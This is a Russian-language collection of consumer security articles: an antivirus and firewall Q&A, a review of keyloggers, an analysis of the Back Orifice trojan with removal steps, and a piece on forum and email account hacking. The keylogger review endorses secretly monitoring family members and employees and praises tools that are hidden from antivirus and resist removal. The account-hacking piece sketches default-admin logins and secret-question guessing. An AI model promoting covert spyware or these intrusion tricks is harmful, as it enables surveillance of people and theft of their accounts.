Очень интересно, как работает антивирусная программа, а особенно кикам образом используется антивирусная база? Из чего она состоит, насколько можно доверять результатам сканирования?
Все намного проще, чем вы думаете. Антивирусная база (а если более точно, то вирусная) складывается из вирусных сигнатур, которые при процессе проверки сравниваются с кодом проверяемого файла. Насколько можно доверять результатам? Это зависит от качества движка и эвристики. Поскольку при сканировании коды некоторых файлов могут быть очень и очень похожими на одну из сигнатур, то ложные срабатывания вполне объяснимы и присутствуют.
До тех пор, пока не подцепил первого вируса, вопрос безопасности не беспокоил вообще. После стал обращать на нее больше внимания. Хотелось бы спросить вашего совета по выбору сетевого экрана. На что следует обращать внимание при его выборе?
В отличие от программы-антивируса, net-экран требует тонкой настройки. Поэтому пользователь должен четко знать, какие сервисы ему необходимы, и, соответственно, какие порты закрывать. Именно поэтому плохих файрволлов не бывает — бывают только плохо настроенные. И все же они делятся на профессиональные и пользовательские. Отличаются они тем, что у профессиональных огромное количество настроек, и при этом ручных, а в пользовательских все максимально автоматизировано. Пользовательский экран не может максимально защитить пользователя просто потому, что он представляет собой что-то общее, а каждый пользователь имеет свои запросы, у каждой системы свои уязвимые места. Поэтому я советую использовать профессиональные. Из конкретных могу посоветовать ZoneAlarm, Outpost, Norton Internet security. Будьте готовы к тому, что придется убить кучу времени, прежде чем net-экран заработает нормально.
На сайтах антивирусных лабораторий размещены бесплатные антивирусные утилиты. Действительно ли они помогают при заражении вирусом? Стоит ли ими пользоваться?
Дело в том, что эти утилиты специализированы и помогают только против одного вредоносного кода. Против той вредоносной программы, для уничтожения которой они предназначены, они очень эффективны, но ничего не могут сделать против других. Некоторые предназначены для борьбы сразу с семейством кодов. Таким образом, от них есть толк только в том случае, если вы точно знаете, чем заражена ваша машина.
После удаления пятого Касперского при установке антивируса Аваст выскочило сообщение, что Аваст не может работать с Касперским в паре (хотя последний удален). Что с этим делать?
Некоторое программное обеспечение при деинсталляции не удаляет записи в системном реестре — в таком случае их необходимо удалять вручную. Но с Касперским такого рода проблемы могут быть только если при его деинсталлировании была допущена ошибка, вследствие которой ключ не удалился. Ветви: Curren_user и Local_machine. Также причиной могла послужить неправильная деинсталляция (например, просто удаление папки).
Может ли вирус, троян или другая вредоносная программа изменить данные в антивирусной базе для предотвращения своего обнаружения? Если да, то какие вредные программы это делают и какие программы защиты больше всего этому подвержены?
Вредоносный код не может каким-либо образом изменить антивирусную базу, он может только удалить ее целиком, и то это невозможно, поскольку резидентный сканер постоянно использует базу. У каждой антивирусной корпорации базы пишутся особенным методом, так что для написания вируса, о котором вы спрашиваете, необходимо знание всех этих методов, а они не выносятся (обычно) за стены компаний. Большинство программ последних двух- трех поколений обладают механизмом анализа и защиты целостности своего кода. Однако у вредоносного ПО (у некоторых его представителей) имеются механизмы защиты (как пример можно привести полиморф-вирусы, стелс-вирусы) от обнаружения. Надеюсь, я полно ответил на ваш вопрос. Если есть какие-то нюансы, которые я не огласил, пишите — или оставляйте вопрос на форуме сайт.
Слышал от многих, что при работе с ресурсоемкими программами для ускорения работы компьютера можно отключить антивирусную программу, если не находишься в сети и не работаешь с CD/ROM. Безопасно ли это?
В принципе, да. Если вы не подключены к сети и не используете оптический привод, то можете смело отключать антивирус. Но вирус может находиться на вашем винчестере, поэтому, если вы часто отключаете антивирус, то привейте себе привычку часто проверять систему антивирусным сканером. Вирус может находиться в «состоянии покоя», в котором он не определяется сканером. После вы запустите программу и нечаянно его активируете (конечно, это необязательно случится). Поэтому чаще сканируйте систему, и, если уверены, что сама система чиста, можете смело отключать… Вирус сам не материализуется:).
А где конкретно хранятся пароли в операционной системе Windows?
Есть несколько мест, где они хранятся. В первую очередь это реестр. Пароли там хранятся в ветке HKLM\Security\Policy\Secrets\Default Password в зашифрованном виде. Также пароли находятся в SAM-файле, который может быть зашифрован системной утилитой syskey. После шифровки данной утилитой взлом этого файла становится крайне проблематичным.
Как узнать открытые порты на моем компьютере? Каким образом закрыть ненужные?
Узнать открытые порты можно двумя способами. Первый — используя команду netstat с параметром — an в командной строке. Пожалуй, это будет наиболее просто. Второй способ требует дополнительных программ. Вам потребуется сканер портов, который можно найти на любом софтовом портале, и необходимо просканировать свой хост (желательно снаружи).
Что такое RSA?
Это асимметричная система шифрования, названная в честь ее разработчиков: Ривеста (Rivest), Шамира (Shamir) и Эдельмана (Adleman). RSA является наиболее известной, проверенной и изученной асимметричной системой шифрования.
Чем обусловлена скорость обновления баз антивирусов?
Дело в том, что, помимо появления новых вирусов, имеются еще и те, которые по тем или иным причинам не попадали еще в руки антивирусных лабораторий. Так что работа у них есть всегда, соответственно и происходят обновления. Обычно это каждые тридцать минут.
Какой лучше всего выбрать параметр при шифровке SAM-файла утилитой syskey?
Лучше всего выбрать хранение ключа расшифровки на дискете, т. к. отсутствие ключа на жестком диске делает практически невозможной расшифровку файла, а значит, и извлечение паролей. Конечно, если вы выберете хранение на винчестере, то трудности при расшифровке тоже будут. Однако максимальный эффект дает хранение на дискете.
Обзор клавиатурных шпионов — лучшие кейлоггеры
Автор: Деймос Стренталл
Необходимое обоснование
Программы шпионы это в первую очередь не кровавое оружие хакеров-анархистов или инструмент контроля тёмных межконтинентальных корпораций, а удобное средство обеспечения личной безопасности, во многих случаях необходимое обычному хаке… тьфу ты, гражданину, особенно в тех условиях, когда к его компьютеру имеют доступ несколько человек. Не благое ли дело установить контроль за домочадцами, особенно детьми, кои в час родительского отсутствия могут растлевать юные умы просмотром неподобающих порталов или воровать деньги с кредитных карт. Да и сотрудники, чересчур активно использующие служебные терминалы в своих личных нуждах, явно нуждаются в надлежащем надзоре со стороны людей дисциплинированных и законопослушных, таких как мы с вами.
Все, представленные в обзоре программы шпионы находятся в свободном доступе по нижеуказанным ссылкам. В то же время приставка free явно ограничивает их функционал. Если вы хотите программу, которая не будет обнаруживаться антивирусами и антитроянами, то за неё придется заплатить. Чем отличается платная версия от бесплатной? В платной вам предоставят следующие возможности: полная скрытность на трее, в запущенных программах и вообще везде (в результате тестирования одной из платных программ я столкнулся с интересной особенностью: запустив раз шпиона очень трудно его выключить, потому что он нигде не отображается), запись абсолютно всех нажатых клавиш; указание запущенных программ и процессов, окон, сайтов и т. п.; запись чатов, icq, mns и т. д.; самозашита от удаления; зашита паролем; отсылка логов на мыло через прокси; самоуничтожение в определенный срок. Купить такую прогу можно зайдя на специализированные форумы информационной безопасности и написав 150 постов: «Дайде кейлагер плыззз. ». Гарантия, что вас не кинут, не подсунут троян и не активизируют кейлоггер против вас самих, стремительно стремится к нулю, увы.
SC-KeyLog PRO
Статус: условно бесплатно.
SC-KeyLog — кейлоггер, способный вести журнал нажатых клавиш, при этом тщательно шифруя нажитое добро. Не стоит также упускать из виду возможность удаленного просмотра log-файла. SC-KeyLog, как и любая программа такого рода, позволяет фиксировать тексты любых типов электронной почты, сообщений интернет-пейджеров msn, icq, aim и других, изменения в текстовых файлах, информацию, вводимую на веб-страницах, кликов мышей, названий открытых окон, времени запуска/завершения программ, времени входа/выхода пользователя, избранного IE, набранных паролей пользователей (не для NT 4.0 и выше) и многое другое. Правильно настроить прогу поможет Wizard, который сразу будет маячить перед глазами после установки кейлоггера на жесткий диск. Да, ты всё правильно понял, SC рекомендуется использовать именно на своём компьютере, а не следить за удалённым объектом.
Юзабилити: при скачивании программы тут же заматерился Касперский 6.0? так что о скрытности речь и не идёт. После установки и запуска, попадаем прямиком в контрольную панель, где можно задать пароль или подчистить лог файл. Закрываем панель и видим перед собой два окошко — слева настраиваем то, что записываем, прямо по центру умильно любуемся результатами работы. Вот собственно, и вся программа.
Оценка: я бы такое даже своим детям не поставил.
Ardamax Keylogger
Статус: условно бесплатно, $34.95.
Вес стандартен для программ такого класса — 392 кб. это средний, легкий в использовании кейлоггер. Программа отслеживает и сохраняет все нажатия клавиш клавиатуры с указанием времени, названия программы (в которой вводились данные) и заголовка окна. Имеет полностью «невидимый» режим работы — скрытая автозагрузка, невидимость файлов, невидимость в Диспетчере задач и др. Есть управление горячими клавишами. При необходимости логи могут периодически отправляться на указанный e-mail и/или FTP.
Юзабилити: Касперский крепко спит. Интерфейс проги нам уже знаком — всё то же самое, разве что в более удачном, на мой взгляд, графическом исполнении. В целом программа тянет на троечку и явно не стоит требуемых денег.
Статус: платная 600 р. У демоверсии длительность мониторинга ограничена 40 минутами.
Помимо возможностей стандартного кейлоггера, Actual Spy может похвастаться весьма солидным набором дополнительных примочек. Самая вкусная из которых, на мой взгляд, снятие скриншотов экрана в заданный промежуток времени, что позволяет решить проблему обнаружения графического пароля, обнаружить графические ограничители доступа к интернет услугам, которыми воспользовался объект и прочее. Помимо того кейлоггер обладает следующими функциями: записывает время запуска/закрытия программ, следит за содержимым буфера обмена, различает регистр нажатых клавиш, приглядывает за принтерами (когда и какой файл был послан на печать), осуществляет мониторинг файловой системы, отслеживает соединения с интернет, перехватывает посещённые сайты, отслеживает включение/выключение компьютера. Лог файлы шифруются, отчёт формируется в удобном текстовом и html-формате, существует отсылка отчёт на указанный e-mail, по ftp или по локальной сети. Само собой на логи можно установить собственный пароль.
При просмотре нажатых клавиш Actual Spy может показывать только символы и не показывать нажатия системных клавиш, что намного удобнее. Например, если были нажаты следующие клавиши:
[Shift]-[Space]keylogger[Ctrl][Shift]», то установив галочку «Показывать только символы» ты увидишь следующий текст: «Программа Actual Spy — keylogger.»
Для удобства, ограничения на размер текстовых логов и размер скриншотов устанавливаются отдельно, так как объём скриншотов как правило занимает намного больше дискового пространства, чем текстовый файл. Устанавливается и ограничение при запоминании содержимого буфера обмена. Если в буфер обмена будут копироваться очень большие объёмы информации, то запоминаться будет только та часть, которую вы указали.
Юзабилити: Сразу замечу, что, во-первых, это самый «толстый» кейлоггер в обзоре — вес Actual Spy 2.8 составляет 1,51 мбайт. Во-вторых, от российских производителей, так что недостатка понимания не будет (хотя в управлении free кейлоггеров смогут разобраться и инопланетяне). И, самое главное, антивирус скромно проигнорил факт установки в системе, хотя и не оставил без внимания подозрительность выполняемых процессов.
Интерфейс приятен, раскладки сгруппированы отлично: вы просматриваете отдельно запущенные программы, смотрите скриншоты, а так же непосредственно наблюдаете набранные клавиши. Для запуска вам следует выбрать необходимые параметры настроек (а если точнее: указать путь к местонахождению лог-файла) (либо не выбирать ничего и оставить «по умолчанию»), нажать «Запуск» и кнопку «Скрыть». Вернуть программу к жизни можно комбинацией клавиш Shift + Ctrl + Alt + F8.
Вывод: прекрасное решение для домашнего шпионажа во благо мира во всём мире. Конечно, могут найтись энтузиасты, способные приспособить Actual Spy для подрывной диверсионной деятельности, но это так же бессмысленно, как вооружать солдат топорами и бензопилами. Для войны нужны совсем другие средства.
EliteKeylogger
Статус: $69, но в рунете лежит лекарство для более ранней версии.
Не знаю на сколько там элитный, но со стандартными функциями, по заявке, вполне справляется, в его цепкие лапки попадают: мессенджеры, сообщения электронной почты, посещённые сайты, все нажатия клавиш, время запуска/выключения программ, все пароли, включая пароль учётной записи Windows, так же записываются имена пользователей и время, проведённое ими за компьютером. и т. д. Включая отслеживание отправленных на самораспечатку документов.
Клавиатурный шпион Elite Keylogger славен тем, что трудно поддаётся обнаружению, работая в режиме низкоуровневого драйвера. Программа хороша тем что её не надо предварительно запускать, она запускается вместе с системой, даже чуть раньше, что даёт возможность схватить логины и пароли при загрузки Windows. Программу невозможно удалить (нужно знать пароль админа программы), её невозможно найти она не светится в трее или лотке, она не выдаёт никаких окон и прочего, что бы могло выдать работу. Работу программы даже не обнаруживает большинство «антикейлогеров».
Программа понимает и показывает нажатия не только стандартных клавиш, букв или цифр, а также и служебные клавиши, CTRL, SHIFT, ALT и другие к служебным также относятся и клавиши F1…F12 и многие другие. EliteKeylogger очень подробно и хорошо работает браузерами. Он следит за URL-ами, который вводит пользователь в браузере, отслеживает на каких страницах были произведены заполнение форм и полей, то есть запоминает заголовки страниц, а также следит и за нажатыми ссылками в браузерах. Отслеживая какие страницы открываются в браузере вы сможете понять и характер человека (а если он к примеру по порно сайтам лазит, или по игровым, а некоторые, например, рефераты ищут).
Юзабилити: это какой-то *№##ец! При установки проги обратите внимание, что именно вы ставите: скрытую установку или саму программу, а то потом намучаетесь с удалением. Сама программа больше смахивает на мультимедийную орбитальную станцию: по количеству вкладочек с настройками однозначно лидирует. К примеру, можно настроить режим съема экрана так, чтобы делать более качественные снимки в определённые моменты времени или при определённых событиях. Хотя лучше составить ключевые слова, используя которые программ может делать акцент на тот или иной снимок экрана. Например, пользователь ввёл фразу «скачать музыку» а программ раз и сделала снимок экрана. Очень удобная штука, обязательно пригодится. Elite Keylogger может делать автоматически снимки экрана точно также как камера наблюдения (хоть каждую секунду или чаще), что при определённых навыках позволяет вскрывать даже самые сложные графические пароли. Если же программа запрограммирована на захват картинок с экрана, а никакие действия не происходят, то она временно прекращает сохранять экраны и ни в коем случае не делает дубликаты снимков экрана. Это позволяет не захламлять одинаковыми картинками лог файл. Keylogger будет также контролировать буфер обмена, но не только скопированный текст, а также и графику (например, выделенная и скопированная информация на web страничку в виде HTML) и скриншоты.
Программа автоматически может удалять устаревшие файлы, когда журнал записи превысил какую-то отметку. Возможно сконфигурировать всё на свой лад и свои требования, а также например указать, что очищать можно лишь только тогда, когда сформирован отчёт и отправлен по почте. Или когда, например, превысил какой-то размер, или раз в неделю или в месяц. Отчёты отправляются по электронной почте, сохраняются в сетевом окружении или скидываются через ftp (проверено, работает, если, конечно же, предварительно покопаться в настройках фаервола).
Заключая, можно заключить: однозначно иметь! Мой выбор.
Статус: платная, есть ознакомительная версия. Чтобы приобрести программу следует связаться с автором: therat@list.ru.
The Rat! как заявлено, программа не для кульных хакеров. Любой уважающий себя хакер может написать что-либо подобное. Прога написана на ассемблере и занимает соответственно 13 кб (ветераны программистского фронта прослезились). Не смотря на размер (уж простите, не вирусописатель я:) прога позволяет следить за нажатием клавиш в парольных окнах и консоли, отслеживает буфера обмена и ещё много чего из стандартных функций. Заявлена полная невидимость для антивирусов и программ, отлавливающих SpyWare и AdWare.
The Rat! снабжен скрепителем файлов (FileConnector), результат работы которого практически исключает детектирование в нем исходных файлов, по сигнатурам, а также текстовым редактором (StringExtractor) для удобной работы с файлом дампа, который решает проблему перекодировки в кириллицу, уборки мусора, сохраняет дамп в удобочитаемый html — файл.
Фактически запуская какую-либо версию The Rat! мы видим программу настройщик-конфигуратор (The Rat! Control Center). Результат работы настройщика — исполняемый (*.exe) файл. Данный файл и является полнофункциональным и самодостаточным клавиатурным шпионом. Его запуск приводит к установке The Rat! в системе. Впоследствии, после перезагрузки системы, программа будет продолжать свою работу. Деинсталлировать The Rat! возможно используя возможности настройщика-конфигуратора либо горячие клавиши.
Юзабилити: к полной версией Касперский отнёсся совершенно равнодушно, а вот демо заметил сразу. Дизайн… ну хакерам понравится. Безумное сочетание чёрного, красного и белого. Куча маленьких кнопочек, потыкав в которые вы найдёте Настройки (все разом в одном окне) или Лог файл. Хотя нормальный просмотр Лога отсутствует в принципе.
Даже не знаю для кого предназначена это программа: функциональности серьёзного кейлоггера ей явно не достаёт, в то же время только безумный ум отнесёт Rat к софту «для домохозяек», чем грозят многие из вышеописанных прог. Хотя для ознакомления с принципа создания кейлоггера вполне сгодится (думаю, автор вполне может предоставить исходник).
P.S. Не попали в обзор по причине полной отстойности (крайне не рекомендую использовать): KGB KeySpy (функционал на пятёрку, но глючит просто неимоверно, настройки постоянно сбиваются), Radar Spy, Invisible Keylogger, Pc Activity Monitor, Spy Agent, Windows Keylogger, AbcKeylogger, PasswordLogger, LttLogger, FKWP, Fearless KeySpy.
Ссылки для скачивания представленных в обзоре программ-кейлоггеров здесь — http://www.diwaxx.ru/soft/security_scaner.php
Когда антивирус упорно молчит…
Автор: Бойцев О.М.
Новейшие версии вредоносного ПО, которое не определяется антивирусами даже с «daily»-базами, и модификации уже существующих вредоносных программ уже давно стали «фоном» современного киберпространства. Вирусописатели всячески изощряются: сегодня уже никого не удивишь вредоносной программой, замаскированной под GPEG-файл; посещение HTML-странички может запросто обернуться подгрузкой на ваш ПК самого настоящего трояна, а выход в Интернет с SP1 — MS Blast’ом, сидящим в самом чреве вашей системы. И тут вопрос даже не в том, что количество вновь появившихся уязвимостей ПО имеет экспоненциальный рост. Тот, кто пишет вредоносное ПО, всегда на шаг впереди того, кто делает от него защиту… В рамках данной статьи на примере известнейшего трояна Back Orifice я постараюсь рассмотреть принцип и особенности работы троянских программ, затронув нестандартные методы поиска и уничтожения вредоносного ПО.
Наш герой — Back Orifice: живая легенда 8 лет спустя…
Без преувеличения будь сказано: с азартным трепетом и чувством глубокого уважения к создателям рассмотрим «анатомию» самой известной и нашумевшей в свое время утилиты — Back Orifice. Подобно тому, как засекреченные документы времен железного занавеса ныне становятся общедоступны, на справедливый суд и критику читателей автор статьи с большим удовольствием представляет сей мануал.
С чего же все началось? Наверняка история создания знаменитого BO была бы неполной без упоминания ее создателей — известнейшей хакерской группы Cult of the Dead Cow (cDc). Основанная в середине 80-х, команда с достоинством прошла огонь, воду и медные трубы и до сих пор процветает и здравствует. В 1993 г. один из участников группы — Drunkfix — создал официальный сайт в сети Интернет, после чего известность хак-группы начала распространятся не только через BBS. Большую заслугу в обретении широкой известности cDc внес один из участников группы — Ratte, — который играл роль своеобразного пресс-атташе… 1 августа 1998 г. на конференции Defcon один из членов группы Sir Dystic представил Back Orifice широкой публике. Как заявил автор, его детище — это лишь подтверждение того, насколько уязвимой может быть MS Windows.
Back Orifice работала (и работает;)) по принципу клиент/сервер и позволяла удаленно администрировать ПК, на котором предварительно установлена серверная часть… Очень скоро BO приобрела статус троянского коня: антивирусные базы пополнились записями типа BackDoor.BOrifice, Trojan.Bo… чему, собственно, удивляться особенно и не приходится, ведь BO с успехом можно использовать и для удаленного управления чужим ПК. Графический интуитивно понятный интерфейс программы и ее внушительные возможности произвели настоящий фурор, после чего в известных кругах установка BO на чужой ПК превратилась во что-то вроде увлекательного соревнования. С выходом в свет новой версии Back Orifice 2000, которая, помимо Win95 и Win98, поддерживала Windows NT и имела открытый код, популярность «народного любимца» достигла своего апогея. Относительно BO начала высказываться и Microsoft: программа, мол, не является прямой угрозой для MS Windows и требует со стороны атакующего установки серверной части на машину жертвы. Так или иначе, а на сегодняшний день знаменитый Back Orifice классифицируется как самый настоящий троян. Согласно современной классификации (использована информация сайт не побоюсь этого слова, наш герой в базах данных различных антивирусных компаний выглядит следующим образом: Backdoor.Win32.BO.a («Лаборатория Касперского»), известен также как Backdoor.BO.a («Лаборатория Касперского»), Orifice.svr (McAfee), W32.HLLP.Clay.dr (Symantec), BackDoor.BOrifice (Doctor Web), Troj/Orifice-A (Sophos), Backdoor: Win32/BOClay (RAV), BKDR_BO.58880 (Trend Micro), Boserve-01 (H+BEDV), W32/Back_Orifice.124928 (FRISK), Win32:Trojan-gen. (ALWIL), BackDoor.BackOrifice (Grisoft), Backdoor.BackOrifice.A (SOFTWIN), Trojan.Bo (ClamAV), Trj/BOr (Panda), Back_Orifice.Dropper (Eset).
Продвигаемся вглубь…
Являясь достаточно мощной утилитой удаленного администрирования, Back Orifice позволяет пользователю контролировать компьютеры при помощи обычной консоли или графической оболочки. А теперь внимание: ни много ни мало крылатая фраза, которая весьма емко отражает возможности программы: «В локальной сети или через Internet BO предоставляет пользователю больше возможностей на удаленном Windows-компьютере, чем имеет сам пользователь этого компьютера»;)). Согласно классификации «Лаборатории Касперского», BO могла вовсе и не попасть в «черный список», если бы не одно но: при запуске серверной части отсутствуют какие-либо предупреждения о запуске: «продвигаясь вглубь», троянец незаметно устанавливает себя в системе и затем берет ее полностью под свой контроль, при этом жертве не выдается никаких сообщений о действиях троянца в системе. Более того, в списке активных приложений ссылка на BO отсутствует…
Attention! A trojan detected
Распространяется BO как пакет, включающий в себя серверную часть (BOSERVE.EXE или bo2k.exe — возможны вариации), клиентскую часть (bo2kgui.exe) и файл конфигурации сервера (bo2kcfg.exe). В дополнение к трем перечисленным компонентам пакет может содержать плагины и документацию. Все три компонента программы написаны на C++ и откомпилированы Microsoft Visual C++. Все программы имеют формат Portable Executable и могут выполняться только в среде Win32.
Как вы уже поняли, основной программой в пакете является BOSERVE.EXE, он же bo2k.exe. Следует отметить, что при установке на целевой ПК сервер можно обнаружить под другими именами вплоть до system, explore и др. в зависимости от фантазии того, кто конфигурировал сервер. Вторым файлом является BOCONFIG.EXE, он же bo2kcfg.exe, назначение которого — первичная настройка сервера. Программа конфигурации позволяет производить самые разнообразные настройки вплоть до склейки сервера с каким-либо другим исполняемым файлом. Зачем это нужно, думаю, объяснять не стоит. И, наконец, то, посредством чего осуществляется удаленное управление серверной частью — клиентская часть — bo2kgui.exe. При запуске серверной части происходит инициализация сокетов Windows (если очень упрощенно, то сокет представляет собой серверный софт, работающий с каким-либо портом) — другими словами, сервер BO настраивает под себя нужные порты, в результате чего открытыми оказываются порт 31337 (кстати, цифра 31337 известна не только благодаря тому, что порт 31337 является дефолтовым портом BO — в околохакерских кругах 31337 означает ни много ни мало «элита»;)). Следует учесть, что при заражении BO 31337 порт может молчать, ведь никто не мешает настроить работу сервер/клиент на другой порт… При заражении в системном каталоге Windows появляется файл WINDLL.DLL. Далее троян определяет адреса нескольких Windows API, ищет свою копию в памяти и выгружает ее, если обнаружена старая версия утилиты — попросту говоря, сам себя обновляет. После вышеперечисленного BO, как и любой уважающий себя троян, копируется в системный каталог Windows (c: \windows\system), прописывая себя на автозапуск в следующем ключе реестра:
После того как троянец закрепляется в системе, он начинает слушать 31337 UDP-порт, оставаясь в памяти Windows как скрытое приложение (т. е. без активного окна и ссылки в списке приложений). После того, как сервер получил команды от клиента, на машине жертвы возможно развитие следующего сценария:
— Сервер высылает своему истинному хозяину различную информацию о системе: тип процессора, размер памяти, версия системы, установленные устройства и т. п.;
— Сервер расшаривает диски, делая их видимыми из сети.
Таким образом, удаленный пользователь получает полный доступ к зараженной системе: операции удаления, копирования и т. п. вплоть до форматирования становятся настолько же реальными, как если бы вы работали за своим собственным ПК;). Помимо перечисленного, удаленный пользователь имеет возможность отключать текущего пользователя от сети, подвешивать систему, убивать процессы, получать и отправлять кэшированные пароли, выводить текстовые сообщения, проигрывать звуковые файлы и т. д., и т. п. Вышеперечисленные возможности отнюдь не являются верхом того, на что способен BO: для того, чтобы расширить список функций, достаточно скачать пару новых плагинов (plug-in) — и все;).
Если ваш антивирус упорно молчит, а возможность присутствия трояна высока, то самое время прибегнуть к следующим инструментам:
SUPERAntiSpyware — бесплатная для частного пользования программа, которая позволяет удалять с компьютера всевозможные виды вредоносного ПО (spyware, adware, malware, trojans, dialers, worms, keyLoggers, HiJackers и другие), восстанавливать нарушенные записи в сетевых соединениях, на рабочем столе, в системном реестре, повышать общую безопасность ПК, закрывая обнаруженные во время запуска бреши в системе безопасности Windows (сайт).
XoftSpy — это одна из лучших программ для удаления шпионских модулей. Одним из преимуществ XoftSpy является высокая скорость сканирования. Другой плюс — регулярные обновления, что особенно важно для утилиты, основное предназначение которой заключается в обеспечении безопасности пользователя (сайт).
SpywareGuard — после инсталляции программа автоматически помещается в автозагрузку и постоянно находится в оперативной памяти компьютера. Программа не требовательна к системным ресурсам. Настроек в ней практически нет — настраиваются всего несколько функций с возможностью задания пароля на смену настроек в этих функциях. Программа послужит отличным помощником антивирусному монитору и серьезной программе для поиска и устранения шпионских модулей (сайт).
Ad-Aware — это продукт, созданный для обеспечения надежной защиты компьютера от известных угроз: кражи личных данных, агрессивной рекламы, сайтов-паразитов, мошеннических программ, некоторых традиционных троянов, номеронабирателей, вредоносных программ (Malware), браузерных «перехватчиков» (Browser hijackers) и шпионских компонентов. Программа использует технологию идентификации последовательности кодов (Code Sequence Identification — CSI), которая обеспечивает не только защиту от известных троянов, но и превентивную защиту от ранее неизвестных угроз. Для большей защиты Ad-Aware SE Personal Edition также может сканировать дополнительные потоки данных (Alternate Data Streams — ADS) в томах файловой системы Windows NT (NTFS).
Теперь внимание! Проверено автором. Если в процессе работы антивирусов, чистильщиков, сканеров и прочих вы все-таки почувствовали, что экзарцист — это вы, а порции адреналина получает кто-то другой, то непременно, даже не задумываясь, вам обязательно следует «убить тварь» собственными руками…
Для ритуала нам понадобятся:
1) виртуальная DOS-машина (по-нашему просто cmd);
2) редактор реестра regedit.
Запускаем regedit, открываем ветвь
(наиболее излюбленное место троянов; NB: данная ветвь — не единственная, где могут сидеть трояны, поэтому не помешает заглянуть еще и сюда:
При обнаружении записи непрошенного гостя удаляем эту запись. Далее необходимо убить процесс, принадлежащий «чужому», для чего очень полезно «знать своих в лицо»: Explorer, Lsass, Services, System, Winlogon, Alg, Vsmon, Ctfmon, Svchost, Csrss, Smss. Естественно, что помимо перечисленных, в диспетчере задач можно обнаружить и другие, «мирные», процессы — те, которые принадлежат запущенным и резидентно выполняющимся приложениям. Это, например, kavsvc, принадлежащий антивирусу Касперского, zonealarm, принадлежащий брандмауэру, и т. д. Особое внимание следует обратить на так называемые процессы-маскировщики, имитирующие истинные: explore, sys, svshost, winlogin, systrey и т. д. При невозможности остановки «злопроцесса» средствами диспетчера задач можно воспользоваться утилитой Process Explorer и ей подобными. Кстати, вышеприведенная утилита окажется весьма и весьма полезной и «в мирное время», т. к. с ее помощью можно завершить даже те процессы, которые штатными средствами не завершишь;).
«Контрольный выстрел» — именно так можно назвать заключительную часть нашего ритуала: необходимо найти и уничтожить тело. А вот тут-то и самое время вспомнить про старый добрый ревизор, который, в отличие от полифагов, в свежих базах не нуждается. В качестве примера более чем уместно привести программу-ревизор Adinf. Принцип работы Adinf основан на сохранении в специальной базе основных данных о каждом логическом диске в системе. При первом запуске в таблицах запоминаются объем оперативной памяти, образы главного загрузочного сектора, загрузочных секторов, список сбойных кластеров, структура дерева каталогов, длины и контрольные суммы файлов. Когда вирус/троян заражает компьютер, он изменяет объект, в который внедряется исполняемый файл, главный загрузочный сектор, FAT-таблицу. Если ревизор обнаруживает на диске изменения, характерные для действия вируса/трояна, он предупреждает об этом пользователя. Важным отличием ADinf от других существующих программ-ревизоров является доступ к дискам без использования функций операционной системы. Такой метод доступа к дискам позволяет успешно обнаруживать стелс- вирусы (вирусы-невидимки). При условии, что был сделан снимок чистой системы, найти и стереть «лишний» файл не составит особого труда.
Не исключено, что при проведении «ритуала» могут возникнуть нештатные ситуации: файл может активно использоваться системой, и все попытки его удалить успехом не увенчаются. Есть ли выход? Конечно же, есть! Все, что нам надо — это удалить тело из-под другой системы — например, загрузившись из-под Linux LiveCD.
Ну что ж, вот, пожалуй, и все. Перезагрузка системы, после чего последний штрих — проверка открытых портов командой netstat — an. Результат команды — список открытых портов
При обнаружении подозрительного порта… процедуру изгнания повторить…
Пароли в Интернет — взгляд изнутри
Автор: Lesnoy_chelovek
Уже множество статей, книг и докладов было посвящено теме безопасности работы в Интернете. Но я решил пойти дальше и показать, что на самом деле может сделать рядовой хакер, обладающий начальными знаниями по взлому. Итак, начнем.
Вы, как и рядовой пользователь сети, любите посидеть в чатах и на форумах. При этом вы не задумываетесь о том, что это может быть опасно. Допустим, вы нашли просто замечательный форум, где есть все, что вам нужно, и вы решили зарегистрироваться на нем. Что ж, это похвально, но есть одно и существенное «но». Когда вы проходите процесс регистрации, то вам необходимо указать ваш почтовый ящик, чтобы вам прислали пароль либо ссылку для активации вашей учетной записи на этом форуме. И что же вы делаете? Не задумываясь, вы спокойно вбиваете существующий адрес электронной почты. Через некоторое время вам приходит письмо, что вы успешно зарегистрировались, что команда разработчиков форума рада вас приветствовать и уверения в том, что ваша информация никуда не пропадет.
Меня в последнее время очень удивляет беспечность создателей форумов и чатов, поскольку они все в один голос утверждают, что их продукт полностью защищен от всяких посягательств злобных хакеров. Так и хочется спросить у них: «Ребята, вы хоть иногда посещаете сайты по электронной безопасности, где уже давно лежат программы для взлома вашего форума/чата?» Итак, что мы имеем? Форум, на котором вы зарегистрировались, и клятвенное заверение разработчиков, что он полностью защищен. А что имеет хакер? Статьи о PHP и SQL и их уязвимостях; а ведь именно с помощью PHP пишется большинство форумов, а SQL используется для создания баз данных, в которых хранится вся информация, которую вы указали при регистрации на форуме. В последнее время стали распространены форумы phpBB и MyBB, и хотя эти форумы создают не новички, а целые группы разработчиков, не проходит и недели, как появляется новая информация об ошибках в исходном коде. Соответственно, хакер проводит взлом форума, о чем его владелец даже не подозревает. Особенно часто взламываются форумы, находящиеся на недавно созданных сайтах. Поскольку создатели этих сайтов зачастую люди неопытные, но уже пытающиеся прыгнуть выше своей головы, то они сразу ставят всяческие форумы, доски объявлений, гостевые книги и т. п. Зачастую эти форумы не настроены должным образом, что облегчает задачу хакера при их взломе. Характерными ошибками таких сайтов является возможность ввести в поля «имя пользователя» и «пароль» строку «admin», и мы тут же перехватываем управление форумом и делаем с ним, все что захочется. Хорошо, если хакер попался добрый и он просто поменял вид форума, но бывают хакеры любопытные, они как раз похищают базу данных, в которой хранится информация о пользователях — имя пользователя, пароль и e-mail.
Давайте на время отойдем от темы статьи и вспомним, а что же хранится в почтовом ящике? Ну, во-первых, личная переписка. Я думаю, никому не приятно, когда читают его письма. Во-вторых, пароли от некоторых сервисов, т. е. тех же форумах, ICQ и т. д. В-третьих, СПАМ. Я так думаю, СПАМ хакерам не интересен, а вот личная переписка, а тем более пароли, точно должны их заинтересовать. Так что же происходит?
Хакер знает ваш e-mail и, соответственно, может захотеть его взломать. «Ну и пусть, у меня суперпароль» — скажете вы. Позвольте вам возразить, существует множество способов не просто взломать, а обойти пароль. Самый простой из них — воспользоваться существующей опцией «Восстановление пароля через секретный вопрос», такая опция предоставляется крупными почтовыми сервисами, такими как Mail.ru и Yandex.Почта. Как правило, пользователь в строку «Ответ на секретный вопрос» пишет первое, что приходит на ум. Соответственно, и хакер вполне может разгадать ваш ответ. Самый простой пример: Вопрос — Мое любимое блюдо; Самый распространенный ответ — пельмени. Или многие любят сочетания — 111, qwerty, admin и, конечно же, hacker.
